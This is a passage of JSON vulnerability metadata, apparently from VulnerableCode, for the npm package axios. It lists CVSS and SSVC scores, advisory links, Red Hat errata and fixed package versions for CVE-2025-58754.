}, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67" }, { "reference_url": "https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06" }, { "reference_url": "https://github.com/axios/axios/pull/7011", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/pull/7011" }, { "reference_url": "https://github.com/axios/axios/pull/7034", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/pull/7034" }, { "reference_url": "https://github.com/axios/axios/releases/tag/v0.30.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/releases/tag/v0.30.2" }, { "reference_url": "https://github.com/axios/axios/releases/tag/v1.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/releases/tag/v1.12.0" }, { "reference_url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/" } ], "url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963", "reference_id": "1114963", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735", "reference_id": "2394735", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735" }, { "reference_url": "https://github.com/advisories/GHSA-4hjh-wcwx-xvwj", "reference_id": "GHSA-4hjh-wcwx-xvwj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4hjh-wcwx-xvwj" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:16747", "reference_id": "RHSA-2025:16747", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:16747" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:18252", "reference_id": "RHSA-2025:18252", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:18252" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19221", "reference_id": "RHSA-2025:19221", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19221" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19375", "reference_id": "RHSA-2025:19375", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19375" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19529", "reference_id": "RHSA-2025:19529", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19529" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19804", "reference_id": "RHSA-2025:19804", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19804" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:22759", "reference_id": "RHSA-2025:22759", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:22759" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:23069", "reference_id": "RHSA-2025:23069", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:23069" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:23131", "reference_id": "RHSA-2025:23131", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:23131" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:23546", "reference_id": "RHSA-2025:23546", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:23546" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1018", "reference_id": "RHSA-2026:1018", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1018" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1942", "reference_id": "RHSA-2026:1942", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1942" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4215", "reference_id": "RHSA-2026:4215", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4215" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6226", "reference_id": "RHSA-2026:6226", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6226" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/68902?format=api", "purl": "pkg:npm/axios@0.30.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-x41s-g5mh-pkdq" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/631910?format=api", "purl": "pkg:npm/axios@1.0.0-alpha.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0-alpha.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/68901?format=api", "purl": "pkg:npm/axios@1.12.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-x41s-g5mh-pkdq" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.0" } ], "aliases": [ "CVE-2025-58754", "GHSA-4hjh-wcwx-xvwj" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aq84-8cnz-byax" } ], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.2" }